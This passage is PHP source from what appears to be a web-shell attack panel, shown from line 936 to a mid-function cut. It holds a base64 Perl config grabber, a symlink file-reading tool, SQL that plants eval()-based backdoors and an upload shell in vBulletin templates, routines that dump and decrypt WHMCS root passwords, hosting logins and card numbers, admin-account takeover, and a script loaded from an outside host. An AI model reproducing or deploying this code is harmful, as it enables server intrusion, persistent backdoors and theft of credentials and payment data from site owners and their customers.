sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
 936 
 937 $write = fwrite ($f2 ,base64_decode($sml_perl));
 938 
 939 if ($write)
 940 {
 941 
 942 @chmod('sa2/perl.pl',0755);
 943 
 944 
 945 }
 946 
 947 echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
 948 }
 949 
 950 
 951 break;
 952 
 953 
 954 }
 955 /// home ///
 956 }
 957 }
 958 else
 959 {
 960 
 961 echo '
 962 The file path to symlink
 963 
 964 <br /><br />
 965 <form method="post">
 966 <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
 967 <input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
 968 <input type="submit" value="symlink" name="symlink" /> <br /><br />
 969 
 970 
 971 
 972 </form>
 973 ';
 974 
 975 
 976 $pfile = $_POST['file'];
 977 $symfile = $_POST['symfile'];
 978 $symlink = $_POST['symlink'];
 979 
 980 if ($symlink)
 981 {
 982 
 983 @symlink("$pfile","sym/$symfile");
 984 
 985 echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
 986 exit;
 987 }else {exit;}
 988 
 989 
 990 
 991 
 992 }
 993 
 994 
 995 
 996 break;
 997 
 998 
 999 
1000 //////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
1001 
1002 
1003 case 'ms':
1004 
1005 
1006 
1007 
1008 $host = $_POST['host'];
1009 $user = $_POST['user'];
1010 $pass = $_POST['pass'];
1011 $db = $_POST['db'];
1012 
1013 
1014 
1015 
1016 
1017 
1018 ////////////////// HEEEEEEEEEEEEERE  /////////////////////////////////////////////// HEEEEEEEEEEEEERE  /////////////////////////////
1019 
1020 if ($_GET['show'] == 'tb'){
1021 
1022 $host_c =  $_COOKIE['host_mysql'];
1023 $user_c =  $_COOKIE['user_mysql'];
1024 $pass_c =  $_COOKIE['pass_mysql'];
1025 $db_c   =  $_COOKIE['db_mysql'];
1026 
1027 
1028 $con = @mysql_connect($host_c,$user_c,$pass_c);
1029 $sel = @mysql_select_db($db_c);
1030 
1031 
1032 if(!$sel){ echo "mysql connect error" ; exit;}
1033 
1034 $dbname = $db_c;
1035 
1036 $pTable =  mysql_list_tables( $dbname ) ;
1037 
1038 $num = mysql_num_rows( $pTable );
1039 
1040 echo "<div class='tmp'>
1041 <table align='center' width='40%'><td> Tables </td><td> Rows </td>";
1042 
1043 for( $i = 0; $i < $num; $i++ ) {
1044 
1045 
1046     $tablename = mysql_tablename( $pTable, $i );
1047 
1048     $sq3l=mysql_query("select  * from $tablename");
1049 
1050     $c3t=mysql_num_rows($sq3l);
1051 
1052     echo "
1053 
1054     <tr>
1055 
1056 <td>
1057 <div class='dom'><a  href='$pg?sws=ms&show=cl&tb=$tablename'  />".$tablename." </a> </div>
1058 </td>
1059 
1060 
1061 <td>
1062 ".$c3t."
1063 </td>
1064 
1065 </tr>
1066 
1067     ";
1068 
1069 
1070 
1071 
1072 if ($tablename == 'template')  { $secript = 'vb'; }
1073 
1074 else if ($tablename == 'wp_post') {$secript = 'wp';}
1075 
1076 else if ($tablename == 'jos_users') {$secript = 'jm';}
1077 
1078 else if ($tablename == 'tbladmins') {$secript = 'wh';}
1079 
1080 
1081 }
1082 
1083 
1084 if ($secript == 'vb')
1085 
1086 {
1087 
1088 
1089 echo '<div class="cont">
1090 <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
1091 <br />  <br /> <b>
1092 [ <a href="?sws=ms&op=in"> Update Index </a>]
1093 
1094 [<a href="?sws=ms&op=sh"> Inject shell</a>]
1095 
1096 [ <a href="?sws=ms&op=shm" >Show members Information</a>]
1097 ';
1098 
1099 
1100 }
1101 
1102 
1103 
1104 else if ($secript == 'wp')
1105 {
1106 
1107 
1108   echo '
1109  <div class="cont">
1110  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options WordPress </b><div>
1111 <br />  <br /> <b>
1112 [ <a href="?sws=ms&op=awp"> Change admin </a>]
1113 
1114 [ <a href="?sws=ms&op=shwp" >Show members</a>]';
1115 
1116 
1117   }
1118 
1119 
1120 else if ($secript == 'wh'){
1121 
1122   echo '
1123  <div class="cont">
1124  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
1125 <br />  <br /> <b>
1126 [ <a href="?sws=ms&op=hroot">roots</a>]
1127 [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
1128 [ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
1129 [ <a href="?sws=ms&op=trak" >tickets</a>]
1130 [ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
1131  [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
1132 [ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
1133 
1134 
1135 }
1136 else{echo '<div class="cont"> ';}
1137 
1138 
1139 /////////////// cmd ////////////////////////////////
1140  echo "<br /><br />
1141 
1142  [ <a href='?sws=ms&op=bkup'> baukup </a>]
1143  [ <a href='?sws=ms&op=css'> Inject css </a>]
1144  <br /><br />
1145 <form method='post'>
1146 <textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
1147 <input type=\"submit\" value=\"SQL\" name='cmd'/>
1148 </form>
1149 <br /><br />
1150 <a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
1151 
1152 if (isset($_POST['cmd']))
1153 {
1154 
1155 $sql  = $_POST['sql'];
1156 
1157 $query =@mysql_query($sql,$con) or die;
1158 
1159 if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">CMD sql successfully </div>  </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red;  font-weight: bold\">CMD sql error </div>  </center>";}
1160 
1161 
1162 }
1163 
1164 exit;
1165 
1166 
1167 }
1168 
1169 ///////////////////// show cl ///////////////
1170 else if ($_GET['show'] == 'cl')
1171 
1172 {
1173 
1174 
1175 
1176 
1177 
1178     $host_c =  $_COOKIE['host_mysql'];
1179     $user_c =  $_COOKIE['user_mysql'];
1180     $pass_c =  $_COOKIE['pass_mysql'];
1181     $db_c   =  $_COOKIE['db_mysql'];
1182 
1183 
1184     $con = @mysql_connect($host_c,$user_c,$pass_c);
1185     $sel = @mysql_select_db($db_c);
1186 
1187     $tb = $_GET['tb'];
1188 
1189     $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
1190 
1191     $num2 = mysql_num_rows( $col_sws );
1192     echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
1193     for( $i2 = 0; $i2 < $num2; $i2++ ){
1194 
1195     $col = mysql_fetch_row($col_sws) ;
1196     $um_sws =  $col[0];
1197 
1198      echo "<tr><td>$um_sws&nbsp;</td>" ;
1199 
1200 
1201      $tit = mysql_query ("SELECT * FROM $tb" );
1202      while ($row = mysql_fetch_assoc($tit))
1203      {
1204 
1205       $cont = $row[$um_sws] ;
1206 
1207      echo "<td>$cont</td></tr>" ;
1208 
1209 
1210 }
1211 
1212 ;
1213 
1214 
1215 }
1216 
1217 
1218 
1219 
1220 exit;
1221 
1222 
1223 }
1224 
1225 
1226 
1227 
1228 
1229 
1230 
1231 
1232 
1233 if (isset($_COOKIE['host_mysql'])){
1234 
1235 if (!isset($_GET['op'])){
1236 
1237 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1238 
1239 
1240 exit;
1241 }
1242 
1243 
1244 }
1245 
1246 
1247 
1248 
1249 
1250 else if (!isset($_COOKIE['host_mysql']))
1251 
1252 {
1253 
1254 
1255 if (!isset($host))
1256 {
1257 
1258 
1259 echo '
1260 
1261 <div >
1262 
1263 <br /><br /><br />
1264 <pre><form method="POST">
1265 host :<input type="text" name="host" /><br />
1266 user :<input type="text" name="user" /><br />
1267 pass :<input type="text" name="pass" /><br />
1268 db   :<input type="text" name="db" /><br />
1269 <input type="submit" name="login" value="login .."   />
1270 </form></pre>';
1271 exit;}
1272 else
1273 {
1274 
1275 $host = $_POST['host'];
1276 $user = $_POST['user'];
1277 $pass = $_POST['pass'];
1278 $db = $_POST['db'];
1279 
1280 
1281 $con = @mysql_connect($host,$user,$pass) ;
1282 
1283 $sel = @mysql_select_db($db,$con);
1284 
1285 if (!$sel)
1286 {
1287 
1288 echo " MYSQL INFOTMATI NOT TREY ";
1289 
1290 
1291 }
1292 
1293 else
1294 {
1295 
1296 
1297 
1298 setcookie( "host_mysql", $host);
1299 setcookie( "user_mysql", $user);
1300 setcookie( "pass_mysql", $pass);
1301 setcookie( "db_mysql", $db);
1302 ob_end_flush();
1303 
1304 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1305 exit;
1306 
1307 
1308 
1309 
1310 
1311 }}}
1312 
1313 
1314 
1315 
1316 /////////////////////////////////// Options /////////////////////////////////////////
1317 
1318 if (isset($_GET['op']))
1319 {
1320 
1321 $op = $_GET['op'];
1322 
1323     $host_c =  $_COOKIE['host_mysql'];
1324     $user_c =  $_COOKIE['user_mysql'];
1325     $pass_c =  $_COOKIE['pass_mysql'];
1326     $db_c   =  $_COOKIE['db_mysql'];
1327 
1328     $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
1329     $sedb3 =@mysql_select_db($db_c,$con3) or die;
1330     if (!$sedb3){echo "error in mysql connect "; exit;}
1331 
1332 
1333       /////// index vb ////////
1334 
1335 if ($op == 'in')
1336 {
1337 
1338 if (!isset($index)){
1339 
1340 echo '
1341     Your index : <br /><br />
1342      <form  method="post">
1343 
1344      <textarea rows="7" name="index" cols="40"></textarea>
1345 
1346      <br /><br />
1347      <input type="submit" value="Update Index" maxlength="30" name="sql" />
1348      </form> ';
1349 }
1350 else if ($_POST['sql'])
1351 {
1352 
1353 
1354 $index =$_POST['index'];
1355 
1356 $index=str_replace("\'","'",$index);
1357 $crypt  = "{\${eval(base64_decode(\'";
1358 $crypt .= base64_encode("echo \"$index\";");
1359 $crypt .= "\'))}}{\${exit()}}</textarea>";
1360 $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
1361 $query =@ mysql_query($sqlindex);
1362 
1363 if ($query)
1364 {
1365   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index successfully </div>  </center>";
1366   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1367   exit;
1368 }
1369 else if (!$query)
1370 {
1371   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index erorr </div>  </center>";
1372   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1373   exit;
1374 
1375 }
1376 
1377 
1378 
1379 
1380 }
1381 
1382 
1383 
1384 
1385 
1386 
1387 
1388 
1389 
1390 
1391 }
1392 /////// shelllll ///////////
1393 else if($op == 'sh')
1394 
1395 {
1396 
1397 
1398 
1399 if (!isset($_POST['ch']))
1400 {
1401 
1402 
1403 echo '
1404 <br /><br /><br />
1405 <form method="post">
1406 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
1407 <select name="ch">
1408 <option value="faq">Inject shell in faq </option>
1409 <option value="cal">Inject shell in calendar </option>
1410 <option value="sea">Inject shell in search </option>
1411 </select>
1412 <br /><br /><br />
1413 <input type="submit" name="sql" value="Inject shell"  />
1414 </form>
1415 
1416 
1417 
1418 ';
1419 
1420 } if (isset($_POST['sql'])){
1421 
1422 $ch = $_POST['ch'];
1423 $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
1424 $crypt  = "{\${eval(base64_decode(\'";
1425 $crypt .= "$shell";
1426 $crypt .= "\'))}}{\${exit()}}</textarea>";
1427 
1428 
1429 
1430 
1431 if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
1432 
1433 elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
1434 
1435 elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
1436 
1437 
1438 $query =@ mysql_query($sqlfaq);
1439 
1440 if ($query)
1441 {
1442   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
1443   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1444   exit;
1445 }
1446 else if (!$query)
1447 {
1448   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been erorr !</div>  </center>";
1449   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1450   exit;
1451 
1452 }
1453 
1454 
1455 }
1456 
1457 
1458 
1459 
1460 
1461 
1462 
1463 
1464 
1465 }
1466 else if ($op == 'shm')
1467 {
1468 
1469 
1470 
1471 
1472 
1473 $sql = 'select * from `user`';
1474 $query =@ mysql_query($sql);
1475 
1476 if ($query)
1477 {
1478 
1479 while ($row = mysql_fetch_assoc($query))
1480 {
1481 
1482 echo "
1483 <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
1484 <tr>
1485        <td>ID :</td>
1486        <td>user :</td>
1487        <td>pass :</td>
1488        <td>salt :</td>
1489        <td>email :</td>
1490 
1491 </tr>
1492 
1493 <tr>
1494        <td>".$row['userid']."</td>
1495        <td>".$row['username']."</td>
1496        <td>".$row['password']."</td>
1497         <td>".$row['salt']."</td>
1498         <td>".$row['email']."</td>
1499 </tr>
1500 
1501 </table>
1502 
1503   ";
1504 
1505 
1506 
1507 
1508 
1509  }}
1510 
1511 }
1512 else if ($op == 'out')
1513 {
1514 
1515 setcookie( "host_mysql", $host,time()-3600);
1516 setcookie( "user_mysql", $user,time()-3600);
1517 setcookie( "pass_mysql", $pass,time()-3600);
1518 setcookie( "db_mysql", $db,time()-3600);
1519 ob_end_flush();
1520 
1521 
1522 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
1523 exit;
1524 
1525 
1526 
1527 }
1528 
1529 ///////////////////////////////// whmcs ////////////////////////////////////////
1530 
1531 
1532 else if ($op == 'hroot')
1533 {
1534 
1535 
1536 
1537 
1538 
1539 
1540 if (isset($_POST['viw']))
1541 {
1542 
1543 $hash = $_POST['hash'] ;
1544 
1545 
1546 $query = mysql_query("SELECT * FROM tblservers");
1547 
1548         echo "<div class='tmp'><table cellpadding='5' align='center'>
1549         hosting roots
1550         <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
1551 
1552         while($row = mysql_fetch_array($query)) {
1553 
1554         echo "<tr>
1555         <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1556 
1557         </tr>";
1558         }
1559         echo "</table>";
1560 
1561 
1562         $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
1563          echo "<table cellpadding='5' align='center'>
1564          <br /><br />
1565          Clients roots
1566         <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
1567 
1568         while($row = mysql_fetch_array($query)) {
1569 
1570         echo "<tr>
1571         <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1572 
1573         </tr>";
1574         }
1575         echo "</table></div>";
1576         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1577         exit;
1578 
1579 
1580 }
1581 else
1582 {
1583 
1584 echo'<form method="post">
1585  <br /><br />
1586 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1587 <input type="submit" name="viw" value="show"  />
1588 
1589 </form>';
1590 exit;
1591 
1592 
1593 
1594 
1595 
1596 }
1597 
1598 
1599 }
1600 
1601 
1602 //////////// domine ////////////
1603 
1604  else if ($op == 'scard')
1605 
1606 {
1607 
1608 if (isset($_POST['viw']))
1609 {
1610 
1611 $hash = $_POST['hash'] ;
1612 
1613 
1614 $query = mysql_query('select * from `tblclients`') ;
1615 echo "<div class='tmp'><table cellpadding='5' align='center'> ";
1616 while($v = mysql_fetch_array($query)) {
1617   echo "
1618   <tr><td>cardtype</td>
1619   <td>id</td>
1620   <td>firstname</td>
1621   <td>lastname</td>
1622   <td>email</td>
1623   <td>city</td>
1624   <td>ciuntry</td>
1625   <td>address1</td>
1626   <td>lastlogin</td>
1627   <td>phonenumber</td>
1628   <td>datecreated</td>
1629   <td>cardnum</td>
1630   <td>startdate</td>
1631   <td>expdate</td>
1632   </tr>";
1633     echo "<tr>
1634 
1635     <td>{$v['cardtype']}</td>
1636     <td>{$v['id']}</td>
1637     <td>{$v['firstname']}</td>
1638     <td>{$v['lastname']}</td>
1639     <td>{$v['email']}</td>
1640     <td>{$v['city']}</td>
1641     <td>{$v['ciuntry']}</td>
1642     <td>{$v['address1']}</td>
1643     <td>{$v['lastlogin']}</td>
1644     <td>{$v['phonenumber']}</td>
1645     <td>{$v['datecreated']}</td>
1646     <td>".decrypt ($v['cardnum'], $hash)."</td>
1647     <td>".decrypt ($v['startdate'], $hash)."</td>
1648     <td>".decrypt ($v['expdate'], $hash)."</td>
1649      </tr></div></table>";
1650      echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1651      exit;
1652 
1653  }
1654 }else
1655 {
1656 
1657 echo'<form method="post">
1658  <br /><br />
1659 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1660 <input type="submit" name="viw" value="show"  />
1661 
1662 </form>';
1663 exit;
1664 
1665 
1666 
1667 
1668 
1669 }
1670 
1671 
1672 
1673 
1674 
1675 
1676 
1677 }
1678 
1679  else if ($op == 'chost')
1680 
1681 {
1682 
1683 
1684 
1685 if (isset($_POST['viw']))
1686 {
1687 
1688 $hash = $_POST['hash'] ;
1689 
1690 $query = mysql_query("SELECT * FROM tblhosting");
1691     echo "<div class='tmp'><table cellpadding='5' align='center'>
1692     <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
1693     while($r = mysql_fetch_array($query)) {
1694     echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
1695     <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
1696     }
1697     echo "</table></div>";
1698    echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1699 
1700     exit;
1701 
1702 
1703 
1704 }
1705 else
1706 {
1707 
1708 echo'<form method="post">
1709  <br /><br />
1710 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1711 <input type="submit" name="viw" value="show"  />
1712 
1713 </form>';
1714 exit;
1715 
1716 
1717 
1718 
1719 
1720 }
1721 
1722 
1723 
1724 
1725 
1726 
1727 
1728 }
1729 
1730 
1731 
1732 else if ($op == 'cadmin')
1733 
1734 {
1735 
1736 
1737 
1738 if (isset($_POST['viw']))
1739 {
1740 
1741 $pass = md5($_POST['pass']);
1742 $user = $_POST['user'];
1743 
1744 
1745 
1746 $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
1747 $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
1748 
1749 if ($query)
1750 {
1751   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
1752           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1753 
1754   exit;
1755 }
1756 
1757 else if (!$query)
1758 {
1759   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
1760           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1761 
1762   exit;
1763 
1764 }
1765 
1766 
1767 
1768 
1769 
1770 
1771 
1772 }
1773 else
1774 {
1775 
1776 echo'<form method="post">
1777  <br /><br />
1778 user : <input type="text" name="user" /><br /><br />
1779 pass : <input type="text" name="pass" /><br /><br />
1780 <input type="submit" name="viw" value="update"  />
1781 
1782 </form>';
1783 
1784 
1785 exit;
1786 
1787 
1788 
1789 
1790 
1791 }
1792 }
1793 
1794 
1795 
1796 else if ($op == 'trak')
1797 
1798 {
1799 
1800 $page = $_GET['page'];
1801 $numpr = 30;
1802 if(!$page){$page = 0;}
1803 $sql0 = mysql_query("Select * from tbltickets");
1804 $num_r0s = mysql_num_rows($sql0);
1805 
1806 
1807 $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
1808 
1809 $ap = 1;
1810 echo "<br /><br /><div>Page  : ";
1811 for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1812 {
1813 
1814 if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1815 else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1816 
1817 
1818 $ap ++;
1819 
1820 }
1821 
1822 echo "</div><br />";
1823 
1824 
1825 while ($r3o = mysql_fetch_assoc($sql))
1826 {
1827 
1828 $email   = $r3o['email'];
1829 $date    = $r3o['date'];
1830 $title   = $r3o['title'];
1831 $message = $r3o['message'];
1832 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1833 
1834 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1835 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1836 echo "</table></div>";
1837 echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1838 exit;
1839 
1840 
1841 
1842 }
1843 
1844 }
1845 
1846 
1847 else if ($op == 'rtrak')
1848 
1849 {
1850 
1851 $page = $_GET['page'];
1852 $numpr = 25;
1853 if(!$page){$page = 0;}
1854 $sql0 = mysql_query("Select * from tblticketreplies");
1855 $num_r0s = mysql_num_rows($sql0);
1856 
1857 
1858 $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
1859 
1860 $ap = 1;
1861 echo "<br /><br /><div>Page  : ";
1862 for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1863 {
1864 
1865 if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1866 else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1867 
1868 
1869 $ap ++;
1870 
1871 }
1872 
1873 echo "</div><br />";
1874 
1875 
1876 while ($r3o = mysql_fetch_assoc($sql))
1877 {
1878 
1879 $email   = $r3o['email'];
1880 $date    = $r3o['date'];
1881 $message = $r3o['message'];
1882 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1883 
1884 echo "<tr><td>email : $email </td><td>date : $date </td></tr>
1885 <tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
1886 echo "</table></div>";
1887 echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1888 exit;
1889 
1890 
1891 
1892 }
1893 
1894 }
1895 
1896 
1897 /////////////////////////////////// backup //////////////////////////
1898 
1899 else if ($op == 'bkup')
1900 {
1901 
1902 
1903 
1904 
1905 
1906 
1907 if (isset($_POST['viw']))
1908 {
1909 
1910 
1911 
1912 $path = $_POST['path'];
1913 
1914 $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
1915 
1916 
1917   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Create backup successfully <br /><br /> $path</div>  </center>";
1918   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1919   exit;
1920 
1921 
1922 
1923 
1924 
1925 
1926 }
1927 else
1928 {
1929 
1930 echo'<form method="post">
1931  <br /><br />
1932 path backup <br /><br /><input type="text" name="path" /><br /><br />
1933 <input type="submit" name="viw" value="Create"  />
1934 
1935 </form>';
1936 exit;
1937 
1938 
1939 
1940 
1941 
1942 }
1943 
1944 
1945 }
1946 
1947 
1948 
1949 
1950 
1951  else if ($op == 'sh3')
1952 
1953 {
1954 
1955 if (isset($_POST['viw']))
1956 {
1957 
1958 $string = $_POST['string'];
1959 $ch = $_POST['ch'];
1960 
1961 if ($ch == 'trs')
1962 {
1963    $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
1964 
1965 }
1966 
1967 else if($ch == 'tr')
1968   {
1969    $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
1970   }
1971 
1972 
1973 
1974 
1975 $nu0 = @mysql_num_rows($sql4);
1976 if ($nu0 == 0){echo "No result"; exit;}
1977 
1978 while ($r33o = mysql_fetch_assoc($sql4))
1979 {
1980 
1981 
1982 $date    = $r33o['date'];
